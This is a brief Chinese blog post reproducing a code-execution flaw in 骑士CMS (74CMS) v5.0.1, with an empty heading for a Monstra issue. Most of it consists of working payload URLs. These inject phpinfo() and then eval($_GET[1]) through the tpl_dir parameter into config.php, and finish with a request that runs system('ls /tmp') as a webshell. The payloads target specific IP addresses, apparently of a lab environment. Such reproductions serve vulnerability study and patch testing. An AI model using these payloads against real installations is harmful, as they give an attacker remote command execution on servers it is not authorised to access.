复现


骑士CMS代码执行

版本和利用条件
v5.0.1
能进后台(管理员)
漏洞验证和利用
验证漏洞是否存在
http://123.58.236.76:36208/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'
http://123.58.236.76:36208/Application/Home/Conf/config.php
getshell
构造请求 http://123.58.236.76:36208/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'

http://123.58.236.76:8834/Application/Home/Conf/config.php?1=system(%22ls%20/tmp%22);
参考地址
https://m.php.cn/article/399438.html
https://www.cnpanda.net/codeaudit/827.html#menu_index_2

Monstra代码执行


文章作者: Lightning
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Lightning !
评论
  目录